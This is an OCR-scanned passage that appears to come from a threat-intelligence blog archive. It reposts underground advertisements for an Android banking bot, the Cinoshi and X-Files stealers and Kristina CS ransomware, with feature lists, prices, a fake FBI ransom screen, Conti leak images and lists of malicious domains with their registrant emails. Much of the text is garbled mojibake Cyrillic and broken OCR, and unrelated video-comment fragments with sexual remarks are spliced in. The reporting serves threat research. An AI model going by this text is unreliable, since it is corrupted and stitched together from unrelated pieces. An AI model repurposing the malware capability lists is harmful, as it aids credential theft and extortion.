evaopsu .cn - Email: spscript@hotmail.com 
keturma .cn - Email: spscript@hotmail.com 
kevsopi .cn - Email: spscript@hotmail.com 
kijxayt .cn - Email: spscript@hotmail.com 
kiluxso .cn - Email: spscript@hotmail.com 
kipuxo .cn - Email: spscript@hotmail.com 
kirdabe .cn - Email: spscript@hotmail.com 
kiwraux .cn - Email: spscript@hotmail.com 


kixyhce .cn - Email: spscript@hotmail.com 
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[3] 
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[4] 


28214 


Hidden SMS interception works from 5 to above. 

Injections work on all current versions 5 - 10. 

The data between the servers and the bot is encrypted. 

Bot deletion blocking. 

Lock disabling rights. 

Blocking the disablement of the Accessibility Service. 

May have several spare domains, for otstuk. 

About 600+ injections for all countries/banks/cryptocurrency 
Disables Play Protect. Once disabled, it cannot be enabled. 


The unique identifier of the bot. 
ANDROID version/Smartphone name. 
Picture marking. 

Country + language that is set in the settings. 
The last retreat. 

Status of Google Play Protect. 

Screen status on/off. 

Injection rights state. 

Status of the Accessibility Service. 
Status of covert interception of SMS. 
Status of permissions for geolocations. 
Availability of bank logs, mail cards. 
List of established banks. 

Device IP. 

The date the device was infected. 


Operator. DUE TO EMULATER IT LACK FOR EXCUTE INJECTIONS 


phone activity. 
Bot time. 


[5] 


BUT WORK FAST ON MOBIL DEVICE/ PHONE 
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[7] 
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_ TeptoPly 


[8] 


nww.BANDICAM .com 


[9] 
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” 
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FBI WARNING 


To view the child porn the phone is 
locked and all files are encrypted, your 
data will be transferred to the FBI you 
have to pay a fine! After paying a fine 

your phone will be unlocked and 
decrypted! 


amount: 200000 


bitcoin: 0.9 


[10] 


Sample description: 

Sending SMS. 

Launch USSD. 

Application launch. 

Change URL admin panel/Redirect. 
Get all SMS. 

Get all installed apps. 

Launch Fake- Locker . 

Getting Keyloggera logs. 

Getting numbers from the phone book. 
Send SMS to your contacts. 
Enable Ransomware 


Turn off Ransomware 


Automatic display of PUSH Notifications. 


Show PUSH Notification. 
Launch SMS spam. 

SMS interception. 

Hidden interception of SMS. 
Show message box. 


Get a list of received permissions. 
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Request permissions for injections. 

Request permissions for Geolocations. 

Launch RAT/VNC. 

Microphone recording. 

View/Manage the File System. 

Follow the screen. 

Request all rights 

Start call forwarding. 

Stop call forwarding. 

Open link in browser. 

Open hidden link in browser. 

Delete application. 

Launch SOSKS5. 

Stop SOSKS5. 

Get the bot’s IP. 

Enable PUSH. 

Disable PUSH. 

Auto-delete applications. 

Smart lock function. 

Works on all versions from 5 to 10. 

Hidden SMS interception works from 5 to above. 
Injections work on all current versions 5 - 10. 

The data between the servers and the bot is encrypted. 
Bot deletion blocking. 

Lock disabling rights. 

Blocking the disablement of the Accessibility Service. 
May have several spare domains, for otstuk. 

About 600+ injections for all countries/banks/cryptocurrency 
Disables Play Protect. Once disabled, it cannot be enabled. 
The unique identifier of the bot. 

ANDROID version/Smartphone name. 

Picture marking. 

Country + language that is set in the settings. 

The last retreat. 


Status of Google Play Protect. 
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Screen status on/off. 

Injection rights state. 

Status of the Accessibility Service. 
Status of covert interception of SMS. 
Status of permissions for geolocations. 
Availability of bank logs, mail cards. 
List of established banks. 


1 month - $ 500 
3 months - $ 1000 
12 months - $ 3000 


ttps://blogger .googleusercontent .com/img/b/R29vVZ2x1/AVvXsEgme jEo3QSIF7j-jehGFnQu4zL7nt Jhf fg9f pkEF6AUYOCB 
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ttps://blogger .googleusercontent .com/img/b/R29vZ2x1/AVvXsEg2BOGFt Zey80c79ydkdxVKhF j ff cWhCizbLkW1u9qpaj J9 


lyRgbXLaH1lgdRSCSTNAgGvOAvuiTLknfMfkyF/7vfL400CQsnZ4PWeg9 


ttps://blogger .googleusercontent .com/img/b/R29VZ2x1/AVvXsEi7 13eXkw4aKy5iPuF j YlovZ1_Aa0SbbYORPOHYORATLVnv. 
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ttps://blogger .googleusercontent .com/img/b/R29vZ2x1/AVvXsEgOUf f wWQoGLOMoX1G40VjDvYifrNOTDkDwsWkLkPwazwGtMo 
02n-DvrQ_GFjFQcmSCii5CmJD8PVCkxFFci60r1YPPGj1lkySqbYWP 


TZEwkHQ7OdntWA9MhvA8qQ_6JUVFRgykOsyFzfPmnxuL1R27-m110 


ttps://blogger .googleusercontent .com/img/b/R29vZ2x1/AVvXsEikgd1m3_nUJkTtcON1QtCCJqwg9wODhSG-xnqi9FwK3DNp 
3PHvvaokw4Lr0_3Ja9YsV80Aum9UIf cW8kqTBtI4ZBBbQyGOEa77p 

ttps://blogger .googleusercontent .com/img/b/R29vZ2x1/AVvXsEje9d6B3vK6MCHeXDsOkd1sK2VtKB28KHroK4V1O05cNQTmIP 

ttps://blogger .googleusercontent .com/img/b/R29vZ2x1/AVvXsEjQI7dqnSiPU340UAuGywOPPa4871HhO0iztE_I0CeSI_a39 
P2Uvm- V1iMBv3Gj JL1v7378hEu- zMR£DBXGdAvOSx-iWPVVUS13x0Q 

ttps://blogger .googleusercontent .com/img/b/R29vZ2x1/AVvXsEhiFNCXJ6ps jEWrL4kt 1GZRQ7bo0owWnbXQK j UNk4WIdf A2 
sfuQ3QCRGnfSJ-Ze61TBcgRhJZ6AzIyv1l2bM0a7mvZmXv-bbHkppv 
0. https://blogger .googleusercontent .com/img/b/R29VZ2x1/AVvXsEjoAqW2nQ9UGFOZ3pdE4GzxNi Jmfal0FN8aT-WrvFypqV 
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Wild (2023-09-18 23:45) 


ke 


[1] 
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Cinoshi — sto MaaS (Malware-as-a-Service) npoekr, KOTOpbiM npeaocraBanerT 

CBOVIM KAMCHTGOM @YHKLIMOHGA CTMAAepa, BOTHETG, KAMnnepa MH Maniepa. 

Bech paree OSBYYeHHbIA @DYHKLIMOHGA HAXOAMTCA B OAHOM BMA4e 4 nOAsepAMBaeT 
PGBOTY CO BCeMM YCTPOMCTBaMn Cc OnepaLjMOHHONM cuicremon Windows. 

Aerko noascetca Kpunty, G TOKAKe MMeeT PAs NOACSHbIX DYyHKLM, 

KOTOpbie He AGAYT BGLUMM AOoraM / BOTGM npondacTb B HEVBBeECTHOM BeSaHe. 

Mbi O4eHb MHOrTO BpeMeHM YAC@AMAM ONTUMMSGLIMM BUAAG, KACGAbHOM paBboTe npoexra, 
@ TaKAe CKCTeMe GBTOMATHYeCKONM SaMenbI NpOKAGAOK. Bce sto 44n Toro, 


(1008) UTOBbI BGM BbIAO YAOBHO POBOTOTe ¢ BGLUMIM Tpa@nKom! 


31 AeHb 


KOHTAK TDI 


@cinoshi_operator 


Halu npoeKT OBAGAGET CrPOMHbIM KOAMYECTBOM NOAGSHOTO PDYHKLIMOHAAG, KOTOPbIM AOCTYNeH NOAbSOBATe ARM 
RO ACLIEBOM NAGTHOM noannicKe. Mbi pexomMeHAyeM BGM NPVOBPeCTM M OLJyTHTb KaYeCcTBO 


| just came across to a newly released cryptocurrency stealing malicious software as a service 
cybercrime ecosystem proposition which has a lot of cryptocurrency and related accounting 
data stealing capabilities. 


Sample screenshots: 
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cinoshi ‘ SS 
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Sample description: 


Cinoshi — 3To MaaS (Malware-as-a-Service) mpoeKT, KOTOPbIA NpegocTaBnAeT CBOUM 
KJIMCHTAaM CYHKLMOHAN CTUNNepa, GOTHETA, KNUNNepa U ManHepa. Becb paHee O3BYYeEHHbIN 
CbyHKLIMOHAN HaxXOANTCA B OFHOM Ounge vu nog gepxKuBaet paboty co BCeMU yCcTpOUCTBamnN C 
OnepauWMoHHoON cuctemon Windows. JlerkKo nogmaetca kpunty, a TakxKe UMeT PAD NONe3HbIX 
CbyHKUNu, KOTOpbIe He AagzAyT BalwiumM Noram / 60TamM NponactTb B Hev3BeCTHON O6e3gHe. Mb 
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eee? 


Favorite + Share Playlists Flag 


Space Faceooce Twter 


> Statistics 4 Dota 
> Video Responses 
Y Text Comments (15) Optiees 


jordanone38 

hmmm i tke that one ts faniher to the video | watch m webstreed Nace Rk 
hope you can watch it too LOC 

jeridas 

[URDIAARRIAARISA 

filajah 

kako ove balenne vole da vide tutu | ne sioday pogied ich 
poormansvideo |! 


that" 


poormansvideo |! 
they where mot scared. the means they want that cock! P 
hebeukiller 


damn. for those girls he's sexy 
what a tactic 


enricuche33 


But the Quis say that she Goesnt care about the size 
But all the girls was staring at the erected pens. and she was laughing 
They thnk im penises afl the ime | 


Freeporthu001 , 
you een lie gil do think abou tthe pens 
yoyohooyo |’ 


lol 
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OYeCHb MHOFO BpeMeHY yAenMNN ONTUMU3aLLUN Bunga, UDeanbHON paboTe npoekTa, a TakxKe 
CUCTeMe ABTOMATUYeECKON 3aMeHbI NPOKNAaAOK. Bce 3sTO ANA Toro, 4YTOObI BaM ObINO yMOOHO 
pa6boTatTb C BaluMM Tpadukom! 


®yHKUMNOHa Stealer: 

— c6op naponen c 6pay3epoB Ha YCTPONCTBe KepTBbl 

— c6op kyku cbannos c Opay3epoB Ha YCTPONCTBe *KePTBbI 

— c6op FecKTONHbIX KPUNTOKOLUEJIbKOB VU paclunpeHun c 6pay3epoB 

— c6op BcenN UvHqdopmaunnu oO ycTpoucTBe (KOMNbIoTepe) KeEpPTBbI! 

— c6op ceccun Steam (c6op ssfn u vdf cbannos) 

— c6op TokKeHos Discord (nog gepx*kKa MHOKECTBA NONYNAPHbIX KJINCHTOB) 
— c6op ceccun Telegram (c6op no QuHamnyeckum nyTam) 

— cOop AaHHbIx c bannoBoro KNueHTa WinSCP (c6op c peectpa) 

— c6op AaHHbIx C annosBoro KnNueHTAa FileZilla (cbop c recentservers.xml) 
— COxpaHeHue CKPUHWOTOB KaxKAOrO MOHUTOPA C KOMNbIOTepa KEPTBbI B JIOF 
— pekypcuBHbi cOop chawnosB c paboyero cTona vu nankuv DOKyYMeHTOB 


— oToOpaxeHue denKoBoN oWWMOKU (TeKCT OWMOKN VU Ha3BaHUA OKHA HaCTpauBaeTca Ha 
naHesybKe) 


— 3aUJUTa OT BUPTYANbHbIX MALUWH, NecoyHuy, Virustotal, Any.Run uv GeankosB (HacTpauBaeTCca 
Ha NaHesbKe) 


— MOmMeH-geTeKkTOp ANA NoucKa HYyXKHbIX NUHKOB B NMaposAXxX WU KYKU (CbuNbTpbI ANA 
domaindetect-a HacTpauBaloTca Ha NaHesbKe) 


— c6op nora ocyuecTBNAeTCA B NaMATU (CHAKEHNE PAaHTAaMM DeETeKTOB) 
®yHKLUMOoHaN Clipper: 

— nogmena 9-Tu KpunTOKOWeNbKOoB B Oyqdepe OOMeHa Ha Bali 

— nogAmeuHa Tpeng ccbinku Steam Ha Bally 


— NonyYeHve KOLWECJIbKa C CEPBepa NPOUCXOAUT Ka bin pa3, TO ECTb NPU CME€HE KOLUECJIbKa 
Bce YRKe YCTAHOBJICHHbIE KAUNNEPbl HAYHYT 3QAMECHATbL Ha HOBbIN afpec 


@yHKuUNOHaN Botnet: 

— 3anuCcb B aBTo3anyck Windows 

— goObaBneHnve B ucKnioYeHuna Windows Defender-a 

— BbINOJIHEHNe KOMAHA C NaHeNu (CKaYaTb VU 3anycTuUTb ann) 
— BO3MOXKHOCTb NPOJIMBAaTb HECKOJIbKO (PaNNIOB OHOBPEMEHHO 
— BO3MOXKHOCTb YKa3aTb YHUKAJIbHOE KOJINNECTBO 3anyCKOB 


— BO3MOMKHOCTb NONYYeHUA FOCTeBONM CCbIIKY CO CTaTUCTMKON (novAONAeT QnA nNpogzaKnu 
UHCTasOB) 


@MyHKLUNOHaN Miner: 


— NOJIHAA HacTpouka MaWHepa NpAMO C NaHesJIU (o6nayHaa HacTponka, nNpu CMeHEe KOLUECJIBKOB 
UJIU HACTPOeK BaM HE NPUAeETCH MCHATb 6uno MaNHepa) 
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— yoOaBneHuve B uUCcKniOYeHuA Windows Defender-a, a TakxKe oTKNIOYeHNe OOHOBNeEHUH 
6e30nNacHocTu Windows 


— BO3MOKHOCTb OTKMIOYGHUA MaNHepa B NOJHOIKPAHHOM pexKume, 4YTOObI 6oTbI He nanunu 
MaiHep urpaa B Urpbl 


— nogaepxka ABYX MOHET OAHOBpemeHHO: Monero Ha npoueccope, Ethereum Classic Ha 
BUgaeOoKapTe 


— aBTOCKDPbITNe/aBTOBbIXOA Np OTKPbITUN AuCneTYepa 3aay. 
Noganuckn: 


Cinoshi $99 - Mecau [Noggaepxka no s106bIM BOonpocaM, NaHeNb, Stealer, Botnet, Miner, Clipper, 
OOHOBNEHUA] 


CroumoctTb nognucku HaBcerga OOFOBapuBaeTCA AUNYHO. 


1. https: //blogger.googleusercontent.com/img/b/R29vZ2x1/AVVXsEjo_4c1GNEOcsgK_lUkrgg92SKdrcJWxXTjk44KXLH2Vm2um 
SgzenikGUscwjYc-NVTsLNyaddBmoCHVu4f TNqSKQ2mfOVMFOzHcxr 
2. https://blogger .googleusercontent .com/img/b/R29vZ2x1/AVvXsEghghY0sVsfuNzNlv0u0KcnnwUg- fP5n9aukmT-YrRLqVOda 
pYkfk3eLshiukNgtQ2WZZFxskyK6xkADDK1EcGNWpbgQrmpxU4LW5x 


19.9.15 A New X-Files Accounting Data Stealer Spotted in the Wild (2023-09-18 23:45) 


[1] 


| just came across to a newly released accounting data stealer known as X-Files. Priced as a 
managed service on a monthly based subscription starting at $120 - 1 Month. $650 - 6 Months. 
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(bonus after the update) $1250 - 12 Months. (bonus after the update) which covers a variety 
of different and unique cryptocurrency stealing and grabbing approaches. 


Sample screenshots include: 


[2] 
ANALYTICS 


Merniber 2022 October 2022 Nowernber 2022 


TOP 10 TEAM MEMBERS TOP 10 COUNTRIES TOP 10 WALLETS 


Actions 
@ Lock 
* B Cotumns 
Seed phrase 
Services 
» @ Crecentiats 
 Autosins 
* Credit cards 
ms" @ Cookies 


@ Oiscord tokens 


Reset 


low 


1d4nh 
tmin 


— 


[5] 
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TELEGRAM NOTIFICATIONS 


Notifications 


Telegram Bot Token Telegram User ID Telegram User ID 


Lt) x 0 


NOTIFICATIONS CONDITIONS 


Notify about all logs 


LOGS SETTINGS 


Uniqueness check 


Check using an IP address and Hardware ID (HWID) 


[6] 


Team manages 
TEAM MANAGING 


TEAM MEMBERS 


Create user (member) ievito uver 


Marne Member type 


Created 


TELEGRAM NOTIFICATIONS 


«= 


Tetegramn Bot Token Tetegram User 10 


o 


MOTEFICATIONS CONCETIONS 


Notify about afl kk 


(Gee) + acscns 


LOGOS SETTINGS 


Uniqueness check 
Alto Guphcates 
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New log from ES, IP: 
15 @ 22 we 2 


Seed phrases 


¥ Crypto 
Discord 


Steam 
v Files 
V¥ Telegram 
(7) als 


[8] 


Name 


1) Autofills 

| Cookies 

| Discord 

I Files 

bf Credit Cards 
if Information 
if Passwords 


ml] Screenshot 


[9] 
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AcdrrinintraderOOTs team Ay 


ANALYTICS 


Septernber 7027 Noverrber 2022 February 2023 dary 2023 


TOP 10 TEAM MEMBERS TOP 10 COUNTRIES 


= (ML) Nethertancs 


RE (08) Uretes © Trustwaset 


Owner of Tear n 


a (US) Unites e 
Guards 


OF (MM) Myanmar 
axl Derty 


a — 
Bi (PE) Pew -S- Mearcowatet 
t) 


om (65) Spain NAPay 
Cony? wtatiet 


@ contase 


J bverwaltet 


2 fxodus 
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[10] 


BUILDS 


Teg Mactievted cox 


aad 


Anti virtual machine Take # screenshot of th 


nutes 


an acd thee noe 


+> Adsrte 


YOUR BUILDS 


Archive password 


[11] 
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LOGS 


© Addresses Domains (search in cookies! 


Start End 


Od MMMM yyy 0d MMMM yy yy 


Q Search 


& Select at 


1. https: //blogger.googleusercontent .com/img/b/R29vZ2x1/AVvXsEhak3NMZMAcoY5c0QaShj1xG5Uu-b_gtwXzHXQsA jhanf g9x 
i13jVOnNjRD1£0SFcPXgQmR-D4-Ssw7FeaghQJkec6Sss3GO0p_CTNCv 

2. https: //blogger .googleusercontent .com/img/b/R29vZ2x1/AVvXsEgUM1 oMiBuY-Kf3kETQRv_HQfH6voclgKaQ1Poqek8LHOVNC 
HIQPKQ7mv7Wubxdg_I3TKc-8ryyAmK- YMouLqyRUJibpjsOb10hDj_ 

3. https: //blogger .googleusercontent .com/img/b/R29vZ2x1/AVvXsEgjZsKOruTiuY4kBlyY5u07b7dDv2AZTwCrL23BuFdTKoTPO 
7zr6ekeR1GETqPR460eVz- uhr3pENZMJ_sZYQMIQUqEURMbsLvf5Yg 

4. https: //blogger. googleusercontent.com/img/b/R29vZ2x1/AVvXsEgQyrxLtzzon3s7 JG--mEZNsKROOFdTZnb_F9EH9c1I__ENT 
44p3V-Mt jmro55B7cWy Jxsf6Aecf JLGEpKiyOVuliHHs 2wUirdkbKf 

5. https: //blogger. googleusercontent .com/img/b/R29vVZ2x1/AVvXsEiapws—-TnGhPraD3_dEBjJtQxCic04USrQdM3UhrUgF yx1V 
NLC6c72DQt1B-F8yXd0Yynidee_w6e3fMtoefg-LaPbWma5NqSRIt4 

6. https: //blogger. googleusercontent .com/img/b/R29vZ2x1/AVVXsEjzBZ_6SbgYPJ5VGApc3lkhuKoFeki3F-X1zS8-7iQktCCR8 
bPh1U56SqJ- jwnjcArf7FgPVYPRXpvU4Z96EBpBdJ-Km12w69zDXsR 

7. https: //blogger. googleusercontent .com/img/b/R29vZ2x1/AVVXsEiT64ve50zFW7d67PzvWegp-MPYSEknuqm2znzRoSImz- XH_ 
6Px4nkKNmMXOtW4xk2r7CLRmE79Xdr cSRXoO0fByup3xXkb3IRof5iTJ4 

8. https: //blogger.googleusercontent .com/img/b/R29vVZ2x1/AVVXsEg9k2q12Bs j-tR4Hedtuwe1XPb791TK9uJ26rQBrLG6y-Lqr 
Df9enH854nibTgVih3TxHn9gGOrDTKAZKQBy 1Rm1UtZa01eu6A4Uxe 

9. https: //blogger .googleusercontent .com/img/b/R29vZ2x1/AVvXsEgbepWngqNdUJD jrQGw1iXh6Cj 5rnfF 1oRmTEmI 1H5W1KGFN1g 
V52CyP5vBD3FOvHfSQHLxeyb01h8BOHjUxgwODwzaL_1271qnZSTLZ 

10. https://blogger.googleusercontent .com/img/b/R29vZ2x1/AVVXsEi91DGByrWRhsrD_LTvbzzRqL4MBXZVKC- g0JUMj emM9L9 
aWArm3exbcMgsSnYYiFTntne-A-QFavlcpkQ_rUd1_wUHxSGAt21vF7g 

11. https://blogger.googleusercontent .com/img/b/R29vZ2x1/AVvXsEh2q_XiDhBDFgrqenoe0b9dBQaeaubu6GJLeh_YhQOOOhN 
wsIb1GEnPSaMyVhV5ZpigA4acIBigrBkm_dUQK6UivxzziLJYGMGIsNF 


19.9.16 A New Kristina CS DIY Ransomware Spotted in the Wild (2023-09-18 23:45) 


[1] 
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BAKRISTINASiken 


| just came across to a new DIY ransomware offered within the cybercrime ecosystem. Priced at 
$2,500 it also offers something | haven’t seen in a while in specific for a ransomware cybercrime 
ecosystem proposition namely its self-propagating features. 


Sample description: 


STOTT Oung He 6e3bI3BECTHbIA KPUNTONOKep/BbIMOraTesb/LUINGPOBaNbLIMK, LUMCpyeT BCce 
cbavnbi NK 3a ucKnioYeHvem chavnoB Windows He HapylwaA paboTb!l CUCTeMbI "KNNeHTAa" 
NK/cepBepa. 


HjaHHaA cxema 3apaboTKa cepaa, npvObiib 3aBUCUT UCKJIOUNTEJIbHO OT Bac u YOeENEHHOTO 
BDEMEHU VU COCTABJIAET OT HYJIA KTO HUNEFO HE Ae€NaeT AO 6OeCKOHEYHOCTU. 


QaHHbIN OunvA HuKOorga He paboTan vu He OygzeT paboTtaTb No P® u cTpaHam CHI, 5To Hawe 
HeEOTbemMsIeEMOe Kpe NO. 


TTX vw Bo3MOxKHOCTH KristinaCS: 

- Pa3spabOTAH Ha BbICOKOYPOBHEBbIM A3bIKe, METOA LUIUCpoBaHnaA AES 256; 

- paboTaeT Ha BCcex BepcuaAx Windows HaunHaag c 2003 roga, x84/x64 u Tak %*e Server; 
- BbICOKaA CKOPOCTb LUUC)POBAaHNA OGecNeYeHa YACTUYHbIM LUMCPOBaHUeM (hanna; 


- wucbpyeT BCe ANCKV VU CbeMHbIe HOCUTENN BO BNeMA LUINCPOBaHNA (Chew KapTbi, Sd KapTbl 
VU Tak ganee); 


- MPU 3anyCKe ONPeAeNAeT NOKASIBHY!O CETb, Luucdpyert HOCUTeJIN CET, 
- BO3MOMKHOCTb BbIOopa onpeAeNeHHOrO Luvcbpyemoro AUCKa UJIU Cbe@MHOPO HOCUTeIIA, 


- BO3MOXKHOCTb BbIOOpa KONNYeCTBa NOTOK LINUCpoBaHuA, PeKOMeHAyeMbie NapameTpbi MO 
3aMacT CAMOCTOATE/IbHO, B 3ABUCUMOCTY OT NpOoU3BOAMTeNbHOCTU MK/CepBepa; 


- He TporaeT HeoOxoAumMple (anni uv nanku Windows Ana nposONKeHUA paboTpl MK/CepBepa; 


- Mpnv wudpoBaHuu nponcxogutT nonHaA nepezanucb dawnoB noBepx, YTO genaeT 
NpakTUYecKN HE BO3MOXKHbIM OPraHU3Z0BaTb BOCCTAHOB/IEHNe DAaHHbIX C NOMOLIbIO R-studio 
YU npoywwmn npogyKtamy; 


- NOAHOCTbIO Odbc)-NaWH LUNdpoBaNbLuIMK, NpVv paboTe He TpebyeTca Balle NpucyTcTBue; 


- nocne LUNcpoOBaHuA 3AQMeHAIOTCA OOON Ha pa6douem cTONe WU BO BC€X KOPHEBbIX NaNnkKax 
CO3QaeTCA TEKCTOBbIN OOKYMEHT C UHCTPYKLIVAMN, a TAK KE 3AMECHACT HA3SBAHNE BCEX cbannos 
Ha afipec 3/1. NOYTbI AIA CBA3N; 


- CCTb PYHKLIMA pacluucpoBky 1060r0 bana Ha BbIOON, YTO Ob! BAL "KNMVEHT" Mor yOeguTbCA 
YTO BbI OONasaeTe TAKON BO3MOMKHOCTbIO; 


- Mpouecc wucpoBaHna npoucxonuT B pexkume HIDE vu He No3BONUT "KNMeHTy" O6HAPyKUTb 
ero, NocNe OKOHYAHUA NPOAYKT aBTOMaTUYeCKY yoansetca c MK/CepBepa KNMeHTa, Tak Ke 
npucytTcTByeT MaHHaA CPyHKLIMA Ha BewiMucdpatope, TeM CaMbIM BaM He HYXHO CNeDUTb 3a 
NpOleccom uv nocne "3aMeTaTb" cnesbl; 
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BapwauTbi COTpyGHM4eCTBa C Hamu: 
1) YcnoBHo 6ecnnaTHaa (PacnpocTpaHeHne): 


Mpuv tTakow’ cxeme Bbl cCTaHOBUYTeCcb pacnpoctpaHutTenem, nonyyYaete O6ecnnaTHO OT 
Hac wudpoBanbuynk KristinaCS L (L- locker), NpwBA3aHHbIA Ha HaLwy NMOYTYy, KOTOpPbIN 
pacnpocTpaHaeTe CaMOCTOATEJIbHO. 


Cxema pa6orTbl cnegzyrouaa: 


Bauwiu "KAWeHTbI" CBA3bIBAIOTCA C HAMM, MbI OOLAEMCA, BbICTABIACM CBOU CPUKCUPOBaHHble 
Tpe6oBaHna B pa3mepe 300 usd. 


Nocne NonyyYeHua BbIrOgbI OT BALWErO "KIMNEHTA" MbI BbINNAYWBaeM Bam 70 % OT NONYYeHHbIX 
cpegacts. BoinnaTbl NDOU3ZBOZATCA pa3 B Hegesito, KaKAYIO NATHULLY, TOJIbKO Ha Bal KOLWeENeK 
BIC. 


CTOUMOCTb NpoyvyKtTa: Ousd 
2) Npogaxka Ounga (Py4Haa Bepcua): 


Npu nonHon nNOKYNKE, BAM NOJIHOCTbw NepeAAaeTCA no NPUBAZSAHHY!O Ha Bally NOYTY, AIA 
CaMOCTOATE/IbHON pa6orTbl. Takum o6pa30m BaM OTKPbIBaloTCA CHIE AYIOLUNE BOZSMOMKHOCTN: 


- CAMOCTOATEJIbBHO OOLAeETECh C "KNNEHTAMU", KOHTPOJIUPYETE MPOLLECC OT VU AO; 


- CaMOCTOATE/IBHO YCTAHaABJIUBAe€TE Pa3sMep Balwew BbIrOgbl Cc "KNWeHTa", OTCTaBNaAeTe 
BO3MOMKHOCTb TOPla, a TAK KE cnoco6 nNOoNyY4eHnaA, 


- NOABNAETCAH BO3MOMKHOCTb co6patb COOCTBeHHYIO KOMaHAYy pacnpoctpaHutenen, npu 
KOTOpON CaMOCTOATEJIBHO Ha3HavaeTe YCJIOBUA padoTpli C HUMY, 


B komnuext KristinaCS sxogut: 


- KristinaCS L - HenocpeaACcTBeHHO CaM noKep/LWMCpoBasIbLUWK NPVBA3ZAaHHbIN Ha Baluy NoUTy, 
KOTOpaAd 6yHeT OTOOpaxKaTbca Ha BCeEX LUNCPOBAHHbIX CbaNNax ANA CBA3BU C BaMU, a Tak Ke 
Ha 000Ax pabouyero CTosa UV B TEKCTOBbIX (bauvnax B KAKAON Nanke. PyYHaar BepcuaA NOZXOAUT 
4A pacnpoctpaHeHua no RDP uw npoynx cnoco6os, Kpome cnama; 


- KristinaCS D - newucpatop cbannos; 

- KristinaCS K - reHepatop knloy¥a OA Qewucdpatopa; 
CToumoctb npoyvykta: 1000usd 

3) Npogaxka Oungaa (ABTOMaTM4eCKHH CTapT); 


Bce Te ®e CamMble€ BO3MOMKHOCTM VU KOMMICKTHOCTb KaK B NYHKTE 2, 3A UCKNIOUeHNeM YTO 
HaAHHAA BEPCUA NPe€AHA3HaAYeHa ANIA paCnpOCTPpaHeHUA NO CONE ACTBOM CnaMa. 


CToumoctb npovykta: 2500usd 

MononHutesbHple ycnyru: 

- MaHyayl no 6ecnnaTHON cxemMe COTpyGHuYecTBa - 6ecnNaTHo; 

- MaHyayl no paboTe 6uyigfa - OecnNaTHO; 

- MaHyayl no cnoco6am pacnpoctpaHeHua u G6e30nacHocTy - GbecnNaTHO; 

- oO6HoBNeHNA MO - 6ecnnaTHo; 

- 3AMeHa D/1.agpeca Ha OIA Tex KTO paboTaeT no cxeme 2 vu 3 - CTOMUMOCTb 200usd; 


- apeHa CepBepa C yCTaHOBJIEHHbIM [10 gna 6pyta RDP - cToumoctb 100usd B mecau; 
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- MMaTHoe obyyeHue pabote, no paboTte c MO, no 6be30nacHOoCcTU UHAUBUAyaNbHoe NVu6O 


B HeOonbuiux rpynnax ANA Tex KTO He CmMOr pa30OpaTbCA B MaHyasax CAMOCTOATE/IbHO - 
CTOUMOCTb 100usd; 


PaboTa 4Yepe3 rapaHT MAHHON NNOWAAKY NPUBeTCTBYyeTCA, 3a Hal CHET. 
Bce B3avMopacueTbI C HAMY TOJIbKO NO CpegACTBOM BITC. 


1. https://blogger . googleusercontent . com/img/b/R29VZ2x1/AVVvXsEgxJF6H79W5znpoFGtRjfAa-eI-AHVOWE60Z2bs04_2ePHW! 


f JeZNhXyOFLp2unqTWwo_- 2HyDVVexVY-6FcxcgcBTOXZOmsyyGYT 


19.9.17 New Images Courtesy of the Conti Ransomware Gang (2023-09-20 12:26) 


Dear blog readers, 


| decided to share with everyone yet another screenshots portfolio courtesy of the [1]Conti 


ransomware gang based on their leaked internal communication which | obtained using my 
methodology. 


What’s specifically interesting about the first image is the mentioning of the [2]morenehost 
bulletproof hosting provider including a dance and teaching school initiatives including the 
usual fashion brand initiative courtesy of the gang. 
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atwain .info - Email: deciable@gmail.com 
bagse .info - Email: calexing@gmail.com 
bedaub .info - Email: jaohra@gmail.com 
bedrid .info - Email: magoetzim@gmail.com 
beeves .info - Email: piproux@gmail.com 
besort .info - Email: jaohra@gmail.com 
bettev .info - Email: recuscon@gmail.com 
bettre .info - Email: phvandiv@gmail.com 
birnam .info - Email: jaohra@gmail.com 
botled .info - Email: deciable@gmail.com 
brawns .info - Email: calexing@gmail.com 
brisky .info - Email: recuscon@gmail.com 
camlet .info - Email: enomman@gmail.com 
caretz .info - Email: piproux@gmail.com 
cheir .info - Email: jaohra@gmail.com 
cuique .info - Email: calexing@gmail.com 


daphni .info - Email: calexing@gmail.com 


deble .info - Email: bebrashe@gmail.com 
debuty .info - Email: stthatch@gmail.com 
declin. info - Email: stthatch@gmail.com 
devicel .info - Email:stthatch@gmail.com 
dislik. info - Email: krharbou@gmail.com 
dolchi. info - Email: stthatch@gmail.com 


dolet. info - Email: magoetzim@gmail.com 
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Sample screenshots include: 


[3] 


MMCC IIIAHETA’ 


00°61 BdSB.LH39 GO IOWION ISMMHMNLIOI UVE HIGHLdanHON 


| 


[4] 
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[5] 
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[6] 
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This award is proudly presented to 


for winning the Best Lesson competition 


at Global School in 


Director: Date: 
[7] 
“ ¢ . > 4 | a! > F 
[8] 


] 


9 


[ 
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[10] 
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OT4ETHLIW KOWEPT 
WKOALI TAHWEB YOULA 


Stay tuned! 
1. https: //ddanchev. blogspot .com/search?q=conti 


2. https://intel471.com/blog/top-bulletproof-hosting-providers-yalishanda-ccweb-brazzzers-2021 
3. 
6ng/7RDZ42LkT1A-X2xEONmL7xtHCR-f JynjdyKayf-4p7xf4-1ihD 


Ay 


N 
(ee) 
N 
W 
K<e) 


9. https: //blogger . googleusercontent . com/img/b/R29vZ2x1/AVvXsE j wLOR4ACcHJi10aeV2wq-OsddHgjiqhpMVuicl7q7VzW6 j 


210erbdUtGa5YQ-H-hGt Jri5z_3NKKoOMd70SV1W_BSFsvuiUBO_wk 
10. https: //blogger.googleusercontent . com/img/b/R29VZ2x1/AVvXsEgkvc jDpR31LgUru90qgspzvEPuTc j JDU110z4jef7rQG 
HrXs8sRLpjNPSCQoPITVo3DyFqpJtQKeVsYskr2LLIimQytL-012Za0i 


19.9.18 Yavor Kolev - Part Three (2023-09-21 18:34) 


[1] 


What’s the main difference between a Bulgarian and the rest of the world? It’s vomit. It’s the 
vomit that sometimes unites us and it’s the vomit that sometimes separates us. 


In this case. It’s the end of the line and goodbye. 


Stay tuned! 


1. https: //blogger.googleusercontent.com/img/a/AVvXsEiny14xWJpVxWfnAOJ1nKf qKUQhULzZIbvY czHq6nNq0eEGcdkRdnwmn IM 
1GQiEw3SNbWSSQj)PY3YdkKVPg_SG2uuZBKEVK8wzZj5YdMRZuMOhP 


19.9.19 Exposing Bulgaria’s Varna Hacking Group (2023-09-26 18:01) 


An image is worth a thousand words. 
Sample photos include: 
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[3] 
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] 


4 


[ 
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dolet. info - Email: magoetzin@gmail.com 
